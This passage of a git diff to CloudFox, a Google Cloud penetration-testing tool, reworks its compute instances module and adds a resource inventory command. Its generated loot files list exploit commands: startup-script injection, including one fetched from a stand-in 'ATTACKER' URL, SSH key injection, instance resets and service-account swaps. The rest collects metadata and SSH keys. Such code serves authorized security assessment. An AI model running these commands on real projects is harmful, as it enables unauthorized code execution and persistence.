+ // Add commands for specific project metadata keys + for key := range meta.RawMetadata { + lootFile.Contents += fmt.Sprintf( + "gcloud compute project-info describe --project=%s --format='value(commonInstanceMetadata.items.filter(key:%s).extract(value).flatten())'\n", + meta.ProjectID, key, + ) + } + + // --- PROJECT-LEVEL EXPLOITATION --- + lootFile.Contents += "\n# === PROJECT-LEVEL EXPLOITATION ===\n\n" + lootFile.Contents += fmt.Sprintf( + "# Add project-wide SSH key (applies to all instances not blocking project keys)\n"+ + "gcloud compute project-info add-metadata --project=%s --metadata=ssh-keys='USERNAME:SSH_PUBLIC_KEY'\n"+ + "# Add project-wide startup script\n"+ + "gcloud compute project-info add-metadata --project=%s --metadata=startup-script='#!/bin/bash\\nwhoami > /tmp/pwned'\n"+ + "# Enable OS Login project-wide\n"+ + "gcloud compute project-info add-metadata --project=%s --metadata=enable-oslogin=TRUE\n", + meta.ProjectID, meta.ProjectID, meta.ProjectID, + ) + + lootFile.Contents += "\n" +} + +// addProjectMetadataFullToLoot adds full project metadata to the metadata loot file +func (m *InstancesModule) addProjectMetadataFullToLoot(projectID string, meta *ComputeEngineService.ProjectMetadataInfo) { + if meta == nil { + return + } + + lootFile := m.LootMap[projectID]["instances-metadata"] + if lootFile == nil { + return + } + + lootFile.Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# PROJECT METADATA: %s\n"+ + "# =============================================================================\n\n", + meta.ProjectID, + ) + + // Output all raw metadata as JSON for completeness + if len(meta.RawMetadata) > 0 { + // Sort keys for consistent output + var keys []string + for k := range meta.RawMetadata { + keys = append(keys, k) + } + sort.Strings(keys) + + for _, key := range keys { + value := meta.RawMetadata[key] + lootFile.Contents += fmt.Sprintf("--- %s ---\n%s\n\n", key, value) + } + 
} else { + lootFile.Contents += "(No project-level metadata found)\n\n" + } +} + +// addInstanceToLoot adds instance commands to the commands loot file +func (m *InstancesModule) addInstanceToLoot(projectID string, instance ComputeEngineService.ComputeEngineInfo) { + lootFile := m.LootMap[projectID]["instances-commands"] + if lootFile == nil { + return + } + + lootFile.Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# INSTANCE: %s (Zone: %s)\n"+ + "# =============================================================================\n\n", + instance.Name, instance.Zone, + ) + + lootFile.Contents += "# === ENUMERATION COMMANDS ===\n\n" + lootFile.Contents += fmt.Sprintf( + "gcloud compute instances describe %s --zone=%s --project=%s\n"+ + "gcloud compute instances get-iam-policy %s --zone=%s --project=%s\n"+ + "gcloud compute instances get-serial-port-output %s --zone=%s --project=%s\n", + instance.Name, instance.Zone, instance.ProjectID, + instance.Name, instance.Zone, instance.ProjectID, + instance.Name, instance.Zone, instance.ProjectID, + ) + + lootFile.Contents += "\n# === METADATA ENUMERATION ===\n\n" + lootFile.Contents += fmt.Sprintf( + "gcloud compute instances describe %s --zone=%s --project=%s --format='value(metadata.items)'\n", + instance.Name, instance.Zone, instance.ProjectID, + ) + + // Add commands for specific metadata keys found + for key := range instance.RawMetadata { + lootFile.Contents += fmt.Sprintf( + "gcloud compute instances describe %s --zone=%s --project=%s --format='value(metadata.items.filter(key:%s).extract(value).flatten())'\n", + instance.Name, instance.Zone, instance.ProjectID, key, + ) + } + + lootFile.Contents += "\n# === CODE EXECUTION / ACCESS ===\n\n" + + // SSH with external IP + if instance.ExternalIP != "" { + lootFile.Contents += fmt.Sprintf( + "# SSH (external IP available)\n"+ + "gcloud compute ssh %s --zone=%s --project=%s\n"+ + "gcloud compute ssh %s 
--zone=%s --project=%s --command='id && hostname'\n", + instance.Name, instance.Zone, instance.ProjectID, + instance.Name, instance.Zone, instance.ProjectID, + ) + } + + // SSH via IAP tunnel (always an option) + lootFile.Contents += fmt.Sprintf( + "# SSH via IAP tunnel\n"+ + "gcloud compute ssh %s --zone=%s --project=%s --tunnel-through-iap\n"+ + "gcloud compute ssh %s --zone=%s --project=%s --tunnel-through-iap --command='id && hostname'\n", + instance.Name, instance.Zone, instance.ProjectID, + instance.Name, instance.Zone, instance.ProjectID, + ) + + // OS Login (if enabled) + if instance.OSLoginEnabled { + lootFile.Contents += fmt.Sprintf( + "# OS Login (enabled on this instance)\n"+ + "gcloud compute os-login ssh-keys add --key-file=~/.ssh/id_rsa.pub\n"+ + "gcloud compute ssh %s --zone=%s --project=%s\n", + instance.Name, instance.Zone, instance.ProjectID, + ) + } + + // Serial console + lootFile.Contents += fmt.Sprintf( + "# Serial console access\n"+ + "gcloud compute connect-to-serial-port %s --zone=%s --project=%s\n", + instance.Name, instance.Zone, instance.ProjectID, + ) + + // SCP file transfer + lootFile.Contents += fmt.Sprintf( + "# SCP file transfer\n"+ + "gcloud compute scp LOCAL_FILE %s:REMOTE_PATH --zone=%s --project=%s\n"+ + "gcloud compute scp %s:REMOTE_PATH LOCAL_FILE --zone=%s --project=%s\n", + instance.Name, instance.Zone, instance.ProjectID, + instance.Name, instance.Zone, instance.ProjectID, + ) + + lootFile.Contents += "\n# === EXPLOIT COMMANDS ===\n\n" + + // Startup script injection + lootFile.Contents += fmt.Sprintf( + "# Add startup script (runs on next boot)\n"+ + "gcloud compute instances add-metadata %s --zone=%s --project=%s --metadata=startup-script='#!/bin/bash\\nwhoami > /tmp/pwned'\n"+ + "# Add startup script from URL\n"+ + "gcloud compute instances add-metadata %s --zone=%s --project=%s --metadata=startup-script-url=http://ATTACKER/script.sh\n", + instance.Name, instance.Zone, instance.ProjectID, + instance.Name, 
instance.Zone, instance.ProjectID, + ) + + // SSH key injection + lootFile.Contents += fmt.Sprintf( + "# Inject SSH key via metadata\n"+ + "gcloud compute instances add-metadata %s --zone=%s --project=%s --metadata=ssh-keys='USERNAME:SSH_PUBLIC_KEY'\n", + instance.Name, instance.Zone, instance.ProjectID, + ) + + // Reset instance (to trigger startup script) + lootFile.Contents += fmt.Sprintf( + "# Reset instance (triggers startup script)\n"+ + "gcloud compute instances reset %s --zone=%s --project=%s\n", + instance.Name, instance.Zone, instance.ProjectID, + ) + + // Set service account + lootFile.Contents += fmt.Sprintf( + "# Change service account (requires stop first)\n"+ + "gcloud compute instances stop %s --zone=%s --project=%s\n"+ + "gcloud compute instances set-service-account %s --zone=%s --project=%s --service-account=TARGET_SA@PROJECT.iam.gserviceaccount.com --scopes=cloud-platform\n"+ + "gcloud compute instances start %s --zone=%s --project=%s\n", + instance.Name, instance.Zone, instance.ProjectID, + instance.Name, instance.Zone, instance.ProjectID, + instance.Name, instance.Zone, instance.ProjectID, + ) + + lootFile.Contents += "\n" +} + +// addInstanceMetadataToLoot adds full instance metadata to the metadata loot file +func (m *InstancesModule) addInstanceMetadataToLoot(projectID string, instance ComputeEngineService.ComputeEngineInfo) { + lootFile := m.LootMap[projectID]["instances-metadata"] + if lootFile == nil { + return + } + + lootFile.Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# INSTANCE: %s (Zone: %s)\n"+ + "# =============================================================================\n\n", + instance.Name, instance.Zone, + ) + + // Output all raw metadata + if len(instance.RawMetadata) > 0 { + // Sort keys for consistent output + var keys []string + for k := range instance.RawMetadata { + keys = append(keys, k) + } + sort.Strings(keys) + + for _, key := range keys { + 
value := instance.RawMetadata[key] + lootFile.Contents += fmt.Sprintf("--- %s ---\n%s\n\n", key, value) + } + } else { + lootFile.Contents += "(No instance-level metadata found)\n\n" + } + + // Also output as JSON for programmatic use + if len(instance.RawMetadata) > 0 { + lootFile.Contents += "--- RAW JSON ---\n" + jsonBytes, err := json.MarshalIndent(instance.RawMetadata, "", " ") + if err == nil { + lootFile.Contents += string(jsonBytes) + "\n\n" + } + } +} + +// addInstanceSSHKeysToLoot adds instance SSH keys to the SSH keys loot file +func (m *InstancesModule) addInstanceSSHKeysToLoot(projectID string, instance ComputeEngineService.ComputeEngineInfo) { + if len(instance.SSHKeys) == 0 { + return + } + + lootFile := m.LootMap[projectID]["instances-ssh-keys"] + if lootFile == nil { + return + } + + lootFile.Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# INSTANCE: %s (Zone: %s)\n"+ + "# =============================================================================\n", + instance.Name, instance.Zone, + ) + + for _, key := range instance.SSHKeys { + lootFile.Contents += key + "\n" + } + lootFile.Contents += "\n" +} + +// addProjectSSHKeysToLoot adds project-level SSH keys to the SSH keys loot file +func (m *InstancesModule) addProjectSSHKeysToLoot(projectID string, meta *ComputeEngineService.ProjectMetadataInfo) { + if meta == nil || len(meta.ProjectSSHKeys) == 0 { + return + } + + lootFile := m.LootMap[projectID]["instances-ssh-keys"] + if lootFile == nil { + return + } + + lootFile.Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# PROJECT-LEVEL SSH KEYS (apply to all instances not blocking project keys)\n"+ + "# =============================================================================\n", + ) + + for _, key := range meta.ProjectSSHKeys { + lootFile.Contents += key + "\n" + } + lootFile.Contents += "\n" +} + +// 
------------------------------ +// Output Generation +// ------------------------------ +func (m *InstancesModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Decide between hierarchical and flat output + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +// writeHierarchicalOutput writes output to per-project directories +func (m *InstancesModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + header := m.getInstancesTableHeader() + sensitiveMetadataHeader := m.getSensitiveMetadataTableHeader() + sshKeysHeader := m.getSSHKeysTableHeader() + + // Build hierarchical output data + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + // Build project-level outputs + for projectID, instances := range m.ProjectInstances { + body := m.instancesToTableBody(instances) + tables := []internal.TableFile{{ + Name: globals.GCP_INSTANCES_MODULE_NAME, + Header: header, + Body: body, + }} + + // Build sensitive metadata table for this project + sensitiveBody := m.buildSensitiveMetadataTableForProject(projectID, instances) + if len(sensitiveBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "instances-sensitive-metadata", + Header: sensitiveMetadataHeader, + Body: sensitiveBody, + }) + } + + // Build SSH keys table for this project + sshKeysBody := m.buildSSHKeysTableForProject(projectID, instances) + if len(sshKeysBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "instances-ssh-keys", + Header: sshKeysHeader, + Body: sshKeysBody, + }) + } + + // Collect loot for this project + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with 
proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } } - serviceAccountEmails += serviceAccount.Email } - body = append(body, []string{ - instance.Name, - instance.ID, - instance.State, - instance.ExternalIP, - instance.InternalIP, - serviceAccountEmails, // Add the aggregated service account emails to the output - instance.Zone, - instance.ProjectID, - }) + outputData.ProjectLevelData[projectID] = InstancesOutput{Table: tables, Loot: lootFiles} + } + + // Create path builder using the module's hierarchy + pathBuilder := m.BuildPathBuilder() + + // Write using hierarchical output + err := internal.HandleHierarchicalOutputSmart( + "gcp", + m.Format, + m.Verbosity, + m.WrapTable, + pathBuilder, + outputData, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_INSTANCES_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +// writeFlatOutput writes all output to a single directory (legacy mode) +func (m *InstancesModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + header := m.getInstancesTableHeader() + sensitiveMetadataHeader := m.getSensitiveMetadataTableHeader() + sshKeysHeader := m.getSSHKeysTableHeader() + + allInstances := m.getAllInstances() + body := m.instancesToTableBody(allInstances) + + // Build sensitive metadata table for all projects + var sensitiveBody [][]string + // Build SSH keys table for all projects + var sshKeysBody [][]string + for projectID, instances := range m.ProjectInstances { + sensitiveBody = append(sensitiveBody, m.buildSensitiveMetadataTableForProject(projectID, instances)...) + sshKeysBody = append(sshKeysBody, m.buildSSHKeysTableForProject(projectID, instances)...) 
+ } + + // Collect all loot files + var lootFiles []internal.LootFile + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } } - tableFiles = append(tableFiles, internal.TableFile{ + // Build table files + tableFiles := []internal.TableFile{{ Name: globals.GCP_INSTANCES_MODULE_NAME, Header: header, Body: body, - }) + }} + + // Add sensitive metadata table if there are any findings + if len(sensitiveBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "instances-sensitive-metadata", + Header: sensitiveMetadataHeader, + Body: sensitiveBody, + }) + } + + // Add SSH keys table if there are any + if len(sshKeysBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "instances-ssh-keys", + Header: sshKeysHeader, + Body: sshKeysBody, + }) + } + + output := InstancesOutput{ + Table: tableFiles, + Loot: lootFiles, + } - return tableFiles + // Write output using HandleOutputSmart with scope support + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", // scopeType + m.ProjectIDs, // scopeIdentifiers + scopeNames, // scopeNames + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_INSTANCES_MODULE_NAME) + m.CommandCounter.Error++ + } } -func (g GCPInstancesResults) LootFiles() []internal.LootFile { - // Define any loot files if applicable - return []internal.LootFile{} +// getInstancesTableHeader returns the instances table header +// Columns are grouped logically: +// - Identity: Project, Name, Type, Zone, State, Machine Type +// - Network: External IP, Internal IP, IP Forward +// 
- Service Account: Service Account, SA Attack Paths, Scopes, Default SA, Broad Scopes +// - Access Control: OS Login, OS Login 2FA, Block Proj Keys, Serial Port +// - Protection: Delete Protect, Last Snapshot +// - Hardware Security: Shielded VM, Secure Boot, vTPM, Integrity, Confidential +// - Disk Encryption: Encryption, KMS Key +// - IAM: IAM Binding Role, IAM Binding Principal +func (m *InstancesModule) getInstancesTableHeader() []string { + return []string{ + // Identity + "Project", + "Name", + "Type", + "Zone", + "State", + "Machine Type", + // Network + "External IP", + "Internal IP", + "IP Forward", + // Service Account + "Service Account", + "SA Attack Paths", + "Scopes", + "Default SA", + "Broad Scopes", + // Access Control + "OS Login", + "OS Login 2FA", + "Block Proj Keys", + "Serial Port", + // Protection + "Delete Protect", + "Last Snapshot", + // Hardware Security + "Shielded VM", + "Secure Boot", + "vTPM", + "Integrity", + "Confidential", + // Disk Encryption + "Encryption", + "KMS Key", + // IAM + "IAM Binding Role", + "IAM Binding Principal", + } } -func runGCPInstancesCommand(cmd *cobra.Command, args []string) { - var projectIDs []string - var account string - parentCmd := cmd.Parent() - ctx := cmd.Context() - logger := internal.NewLogger() - - if value, ok := ctx.Value("projectIDs").([]string); ok && len(value) > 0 { - projectIDs = value - } else { - logger.ErrorM("Could not retrieve projectIDs from flag value or value is empty", globals.GCP_INSTANCES_MODULE_NAME) - return +// isManagedInstance returns true if the instance is managed by a GCP service (GKE, Dataproc, etc.) 
+func isManagedInstance(instanceType ComputeEngineService.InstanceType) bool { + switch instanceType { + case ComputeEngineService.InstanceTypeGKE, + ComputeEngineService.InstanceTypeMIG, + ComputeEngineService.InstanceTypeDataproc, + ComputeEngineService.InstanceTypeDataflow, + ComputeEngineService.InstanceTypeComposer, + ComputeEngineService.InstanceTypeBatchJob, + ComputeEngineService.InstanceTypeAppEngine: + return true + default: + return false } +} - if value, ok := ctx.Value("account").(string); ok { - account = value - } else { - logger.ErrorM("Could not retrieve account email from command", globals.GCP_IAM_MODULE_NAME) +// formatManagedBool formats a boolean value with context for managed instances +// For managed instances, values that match expected behavior are annotated with (TYPE) to indicate this is expected +// Example: Delete Protection "No" on a GKE node shows "No (GKE)" because GKE nodes are ephemeral +func formatManagedBool(value bool, instanceType ComputeEngineService.InstanceType, expectedForManaged bool) string { + if !isManagedInstance(instanceType) { + return shared.BoolToYesNo(value) } - ces := ComputeEngineService.New() - var results []ComputeEngineService.ComputeEngineInfo - - // Set output params leveraging parent (gcp) pflag values - verbosity, _ := parentCmd.PersistentFlags().GetInt("verbosity") - wrap, _ := parentCmd.PersistentFlags().GetBool("wrap") - outputDirectory, _ := parentCmd.PersistentFlags().GetString("outdir") - format, _ := parentCmd.PersistentFlags().GetString("output") - - for _, projectID := range projectIDs { - logger.InfoM(fmt.Sprintf("Retrieving all instances from project: %s", projectID), globals.GCP_INSTANCES_MODULE_NAME) - result, err := ces.Instances(projectID) - if err != nil { - logger.ErrorM(err.Error(), globals.GCP_INSTANCES_MODULE_NAME) - return - } - results = append(results, result...) 
- logger.InfoM(fmt.Sprintf("Done retrieving all instances from project: %s", projectID), globals.GCP_INSTANCES_MODULE_NAME) - cloudfoxOutput := GCPInstancesResults{Data: results} - err = internal.HandleOutput("gcp", format, outputDirectory, verbosity, wrap, globals.GCP_INSTANCES_MODULE_NAME, account, projectID, cloudfoxOutput) - if err != nil { - logger.ErrorM(err.Error(), globals.GCP_INSTANCES_MODULE_NAME) - return - } - logger.InfoM("Done writing output", globals.GCP_INSTANCES_MODULE_NAME) + // For managed instances, add context when the value matches expected behavior + // This indicates "this looks like a finding but it's expected for this instance type" + shortType := string(instanceType) + if value == expectedForManaged { + if value { + return fmt.Sprintf("Yes (%s)", shortType) + } + return fmt.Sprintf("No (%s)", shortType) + } + + // Value differs from expected - no annotation needed + return shared.BoolToYesNo(value) +} + +// formatManagedSnapshot formats the last snapshot date with context for managed instances +func formatManagedSnapshot(lastSnapshot string, instanceType ComputeEngineService.InstanceType) string { + // For ephemeral/managed instances, "Never" is expected + if lastSnapshot == "" || lastSnapshot == "Never" { + if isManagedInstance(instanceType) { + return fmt.Sprintf("Never (%s)", string(instanceType)) + } + return "Never" + } + + // Truncate to just the date portion if it's a full timestamp + if len(lastSnapshot) > 10 { + lastSnapshot = lastSnapshot[:10] + } + return lastSnapshot +} + +// getSensitiveMetadataTableHeader returns the sensitive metadata table header +func (m *InstancesModule) getSensitiveMetadataTableHeader() []string { + return []string{ + "Project", + "Source", + "Zone", + "Metadata Key", + "Variable", + "Type", + "Value", + } +} + +// getSSHKeysTableHeader returns the SSH keys table header +func (m *InstancesModule) getSSHKeysTableHeader() []string { + return []string{ + "Project", + "Source", + "Zone", + "SSH Key", + } +} 
+ +// buildSSHKeysTableForProject builds the SSH keys table body for a specific project +func (m *InstancesModule) buildSSHKeysTableForProject(projectID string, instances []ComputeEngineService.ComputeEngineInfo) [][]string { + var body [][]string + + // Add project-level SSH keys + if meta, ok := m.ProjectMetadata[projectID]; ok && meta != nil && len(meta.ProjectSSHKeys) > 0 { + for _, key := range meta.ProjectSSHKeys { + body = append(body, []string{ + m.GetProjectName(projectID), + "PROJECT", + "-", + truncateSSHKeyMiddle(key, 100), + }) + } + } + + // Add instance-level SSH keys + for _, instance := range instances { + if len(instance.SSHKeys) > 0 { + for _, key := range instance.SSHKeys { + body = append(body, []string{ + m.GetProjectName(instance.ProjectID), + instance.Name, + instance.Zone, + truncateSSHKeyMiddle(key, 100), + }) + } + } + } + + return body +} + +// truncateSSHKeyMiddle truncates an SSH key in the middle, preserving start and end for searchability +// Format: "user:ssh-rsa AAAA...xyz comment" -> "user:ssh-rsa AAAA...xyz comment" +func truncateSSHKeyMiddle(key string, maxLen int) string { + if len(key) <= maxLen { + return key + } + // Keep more at the start (user and key type) and end (comment) + startLen := maxLen * 2 / 3 // ~66% at start + endLen := maxLen - startLen - 5 // 5 for " ... " + if endLen < 10 { + endLen = 10 + startLen = maxLen - endLen - 5 + } + return key[:startLen] + " ... 
" + key[len(key)-endLen:] +} + +// instancesToTableBody converts instances to table body rows +func (m *InstancesModule) instancesToTableBody(instances []ComputeEngineService.ComputeEngineInfo) [][]string { + var body [][]string + for _, instance := range instances { + // Get first service account email (most instances have just one) + saEmail := "-" + scopes := "-" + if len(instance.ServiceAccounts) > 0 { + saEmail = instance.ServiceAccounts[0].Email + scopes = ComputeEngineService.FormatScopes(instance.ServiceAccounts[0].Scopes) + } + + // Check attack paths (privesc/exfil/lateral) for the service account + // FoxMapper takes priority if available (graph-based analysis) + attackPaths := "run foxmapper" + if saEmail != "-" { + attackPaths = gcpinternal.GetAttackSummaryFromCaches(m.FoxMapperCache, nil, saEmail) + } else if m.FoxMapperCache != nil && m.FoxMapperCache.IsPopulated() { + attackPaths = "No SA" + } + + // External IP display + externalIP := instance.ExternalIP + if externalIP == "" { + externalIP = "-" + } + + // Encryption display + encryption := instance.BootDiskEncryption + if encryption == "" { + encryption = "Google" + } + + // KMS Key display + kmsKey := instance.BootDiskKMSKey + if kmsKey == "" { + kmsKey = "-" + } + + // Instance type for contextual display + instType := instance.InstanceType + if instType == "" { + instType = ComputeEngineService.InstanceTypeStandalone + } + + // Base row data (reused for each IAM binding) + // Order matches header groups: Identity, Network, Service Account, Access Control, Protection, Hardware Security, Disk Encryption + baseRow := []string{ + // Identity + m.GetProjectName(instance.ProjectID), + instance.Name, + string(instType), + instance.Zone, + instance.State, + instance.MachineType, + // Network + externalIP, + instance.InternalIP, + shared.BoolToYesNo(instance.CanIPForward), + // Service Account + saEmail, + attackPaths, + scopes, + // Default SA is expected for GKE/managed instances + 
formatManagedBool(instance.HasDefaultSA, instType, true), + // Broad scopes are expected for GKE/managed instances + formatManagedBool(instance.HasCloudScopes, instType, true), + // Access Control + shared.BoolToYesNo(instance.OSLoginEnabled), + shared.BoolToYesNo(instance.OSLogin2FAEnabled), + shared.BoolToYesNo(instance.BlockProjectSSHKeys), + shared.BoolToYesNo(instance.SerialPortEnabled), + // Protection - Delete protection is NOT expected for managed instances (they're ephemeral) + formatManagedBool(instance.DeletionProtection, instType, false), + // Snapshots are not expected for ephemeral/managed instances + formatManagedSnapshot(instance.LastSnapshotDate, instType), + // Hardware Security + shared.BoolToYesNo(instance.ShieldedVM), + shared.BoolToYesNo(instance.SecureBoot), + shared.BoolToYesNo(instance.VTPMEnabled), + shared.BoolToYesNo(instance.IntegrityMonitoring), + shared.BoolToYesNo(instance.ConfidentialVM), + // Disk Encryption + encryption, + kmsKey, + } + + // If instance has IAM bindings, create one row per binding + if len(instance.IAMBindings) > 0 { + for _, binding := range instance.IAMBindings { + row := make([]string, len(baseRow)+2) + copy(row, baseRow) + row[len(baseRow)] = binding.Role + row[len(baseRow)+1] = binding.Member + body = append(body, row) + } + } else { + // No IAM bindings - single row + row := make([]string, len(baseRow)+2) + copy(row, baseRow) + row[len(baseRow)] = "-" + row[len(baseRow)+1] = "-" + body = append(body, row) + } } + return body +} + +// buildSensitiveMetadataTableForProject builds the sensitive metadata table body for a specific project +func (m *InstancesModule) buildSensitiveMetadataTableForProject(projectID string, instances []ComputeEngineService.ComputeEngineInfo) [][]string { + var body [][]string + + // Add project-level sensitive metadata + if meta, ok := m.ProjectMetadata[projectID]; ok && meta != nil && len(meta.SensitiveMetadata) > 0 { + for _, item := range meta.SensitiveMetadata { + body = 
append(body, []string{ + m.GetProjectName(projectID), + "PROJECT", + "-", + item.MetadataKey, + item.Key, + item.Type, + item.Value, + }) + } + } + + // Add instance-level sensitive metadata + for _, instance := range instances { + if len(instance.SensitiveMetadata) > 0 { + for _, item := range instance.SensitiveMetadata { + body = append(body, []string{ + m.GetProjectName(instance.ProjectID), + instance.Name, + instance.Zone, + item.MetadataKey, + item.Key, + item.Type, + item.Value, + }) + } + } + } + + return body } diff --git a/gcp/commands/inventory.go b/gcp/commands/inventory.go new file mode 100644 index 00000000..f88f0701 --- /dev/null +++ b/gcp/commands/inventory.go @@ -0,0 +1,1537 @@ +package commands + +import ( + "context" + "fmt" + "sort" + "strconv" + "strings" + "sync" + + apikeysservice "github.com/BishopFox/cloudfox/gcp/services/apikeysService" + artifactregistryservice "github.com/BishopFox/cloudfox/gcp/services/artifactRegistryService" + assetservice "github.com/BishopFox/cloudfox/gcp/services/assetService" + bigqueryservice "github.com/BishopFox/cloudfox/gcp/services/bigqueryService" + bigtableservice "github.com/BishopFox/cloudfox/gcp/services/bigtableService" + certmanagerservice "github.com/BishopFox/cloudfox/gcp/services/certManagerService" + cloudarmorservice "github.com/BishopFox/cloudfox/gcp/services/cloudArmorService" + cloudbuildservice "github.com/BishopFox/cloudfox/gcp/services/cloudbuildService" + cloudrunservice "github.com/BishopFox/cloudfox/gcp/services/cloudrunService" + cloudsqlservice "github.com/BishopFox/cloudfox/gcp/services/cloudsqlService" + cloudstorageservice "github.com/BishopFox/cloudfox/gcp/services/cloudStorageService" + composerservice "github.com/BishopFox/cloudfox/gcp/services/composerService" + computeengineservice "github.com/BishopFox/cloudfox/gcp/services/computeEngineService" + dataflowservice "github.com/BishopFox/cloudfox/gcp/services/dataflowService" + dataprocservice 
"github.com/BishopFox/cloudfox/gcp/services/dataprocService" + dnsservice "github.com/BishopFox/cloudfox/gcp/services/dnsService" + filestoreservice "github.com/BishopFox/cloudfox/gcp/services/filestoreService" + functionsservice "github.com/BishopFox/cloudfox/gcp/services/functionsService" + gkeservice "github.com/BishopFox/cloudfox/gcp/services/gkeService" + iamservice "github.com/BishopFox/cloudfox/gcp/services/iamService" + kmsservice "github.com/BishopFox/cloudfox/gcp/services/kmsService" + loggingservice "github.com/BishopFox/cloudfox/gcp/services/loggingService" + memorystoreservice "github.com/BishopFox/cloudfox/gcp/services/memorystoreService" + notebooksservice "github.com/BishopFox/cloudfox/gcp/services/notebooksService" + pubsubservice "github.com/BishopFox/cloudfox/gcp/services/pubsubService" + schedulerservice "github.com/BishopFox/cloudfox/gcp/services/schedulerService" + secretsservice "github.com/BishopFox/cloudfox/gcp/services/secretsService" + sourcereposservice "github.com/BishopFox/cloudfox/gcp/services/sourceReposService" + spannerservice "github.com/BishopFox/cloudfox/gcp/services/spannerService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" + serviceusage "google.golang.org/api/serviceusage/v1" +) + +const GCP_INVENTORY_MODULE_NAME = "inventory" + +var GCPInventoryCommand = &cobra.Command{ + Use: GCP_INVENTORY_MODULE_NAME, + Aliases: []string{"inv", "resources"}, + Short: "Quick resource inventory - works without Cloud Asset API", + Long: `Quick resource inventory that works even when Cloud Asset API is not enabled. 
+ +USE THIS COMMAND WHEN: +- You want a quick overview of resources across projects +- Cloud Asset API is not enabled in your projects +- You need a fallback that always works + +For deep analysis with IAM policies and resource dependencies, use 'asset-inventory' instead +(requires Cloud Asset API to be enabled). + +HOW IT WORKS: +1. Tries Cloud Asset API first (if enabled) for complete coverage +2. Falls back to Service Usage API to identify enabled services +3. Always runs dedicated CloudFox enumeration for security-relevant resources + +This ensures you get results even in restricted environments where the +Cloud Asset API (cloudasset.googleapis.com) is not enabled. + +OUTPUT INCLUDES: +- Resource counts by type (Compute instances, GKE clusters, Cloud Functions, etc.) +- Regional distribution of resources +- CloudFox coverage analysis (identifies potential blind spots) +- Total resource counts per project + +SUPPORTED RESOURCE TYPES: +- Compute: Instances, Disks, Snapshots, Images +- Containers: GKE Clusters, Cloud Run Services/Jobs +- Serverless: Cloud Functions, App Engine +- Storage: Buckets, Filestore, BigQuery Datasets +- Databases: Cloud SQL, Spanner, Bigtable, Memorystore +- Networking: DNS Zones +- Security: Service Accounts, KMS Keys, Secrets, API Keys +- DevOps: Cloud Build Triggers, Source Repos, Artifact Registry +- Data: Pub/Sub Topics, Dataflow Jobs, Dataproc Clusters +- AI/ML: Notebooks, Composer Environments + +Examples: + cloudfox gcp inventory -p my-project + cloudfox gcp inventory -A # All accessible projects`, + Run: runGCPInventoryCommand, +} + +// ResourceCount tracks count of a resource type per region +type ResourceCount struct { + ResourceType string + Region string + Count int + ResourceIDs []string // For loot file +} + +// AssetTypeSummary holds Cloud Asset Inventory counts by type +type AssetTypeSummary struct { + AssetType string + Count int + Covered bool // Whether CloudFox has a dedicated module for this type +} + +// 
InventoryModule handles resource inventory enumeration +type InventoryModule struct { + gcpinternal.BaseGCPModule + + // Resource tracking (from dedicated enumeration) - NOW PER PROJECT + projectResourceCounts map[string]map[string]map[string]int // projectID -> resourceType -> region -> count + projectResourceIDs map[string]map[string]map[string][]string // projectID -> resourceType -> region -> []resourceID + projectRegions map[string]map[string]bool // projectID -> regions with resources + mu sync.Mutex + + // Asset Inventory tracking (complete coverage) + assetCounts map[string]map[string]int // projectID -> assetType -> count + assetAPIEnabled bool // Whether any project had Asset API enabled + assetAPIFailedProjs []string // Projects where Asset API failed + + // Service Usage tracking (fallback when Asset API not available) + enabledServices map[string][]string // projectID -> list of enabled services + + // Totals (per project) + projectTotalByType map[string]map[string]int // projectID -> resourceType -> count + projectTotalByRegion map[string]map[string]int // projectID -> region -> count + projectGrandTotal map[string]int // projectID -> total count + + // Global totals + grandTotal int + + // Asset totals + assetGrandTotal int +} + +// InventoryOutput implements CloudfoxOutput interface +type InventoryOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o InventoryOutput) TableFiles() []internal.TableFile { return o.Table } +func (o InventoryOutput) LootFiles() []internal.LootFile { return o.Loot } + +func runGCPInventoryCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, GCP_INVENTORY_MODULE_NAME) + if err != nil { + return + } + + module := &InventoryModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + projectResourceCounts: make(map[string]map[string]map[string]int), + projectResourceIDs: make(map[string]map[string]map[string][]string), + projectRegions: 
